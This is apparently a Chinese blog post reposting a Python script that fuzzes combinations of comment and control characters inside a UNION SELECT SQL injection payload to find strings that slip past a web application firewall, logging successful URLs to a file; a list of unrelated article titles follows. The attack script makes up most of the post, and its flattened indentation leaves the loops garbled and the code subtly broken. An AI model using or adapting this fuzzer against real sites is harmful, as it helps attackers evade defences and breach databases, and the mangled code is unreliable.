sql bypass waf fuzz python
2024-09-06 10:34:02
从freebuf copy过来的,先保存,有空再改
#encoding=utf-8 import requests url = "http://127.0.0.1/index.php?id=1"
Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','=']
Fuzz_b = ['']
Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
pass
for b in FUZZ:
pass
for c in FUZZ:
for d in FUZZ:
pass
for e in FUZZ:
pass
PYLOAD = "/*!union"+a+b+c+d+e+"select*/ 1,2"
urlp = url+PYLOAD
res = requests.get(urlp,headers=header)
#使用for排列组合fuzz字典并请求页面
if 'flag' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
print ("[*]URL:"+ urlp +"过狗!")
f=open('result.txt','a')
f.write(urlp+"n")
f.close
最新文章
- NuGet包调试源码的方法
- JVM参数调优
- 使用JDBC处理MySQL大数据
- 前端SPA框架一些看法
- Android架构分析之Android消息处理机制(二)
- (转)PHP中构造函数和析构函数解析
- Solr In Action 笔记(2) 之 评分机制(相似性计算)
- Makefiles 介绍
- MSSQL - 逻辑主键、业务主键和复合主键
- 转:iOS程序main函数之前发生了什么
- Go-new和make
- [luogu P3128][USACO15DEC]Max Flow [LCA][树上差分]
- Github上怎么修改别人的项目并且提交给原作者!图文并茂!
- Linux时间子系统之(十七):ARM generic timer驱动代码分析
- Docker 核心技术之网络管理
- 熟悉常用的HDFS操作
- Python模块之信号(signal)
- grid和flex区别
- 神州数码广域网PPP封装CHAP认证配置
- dubbo面试题,会这些说明你真正看懂了dubbo源码
热门文章
- History和Screen的对象属性
- 【机器学习 Azure Machine Learning】使用Aure虚拟机搭建Jupyter notebook环境,为Machine Learning做准备(Ubuntu 18.04,Linux)
- 19. [链表][双指针]删除链表的倒数第N个节点
- RestTemplate+Ribbon实现服务调用
- 我天天curd,怎么才能成长?
- Mac 搭建 Redis 集群
- js 实现吸顶效果 || 小程序的吸顶效果
- 实现多Realm时,可能会出现的问题
- 配置域名与Https
- Luogu P3200 [HNOI2009]有趣的数列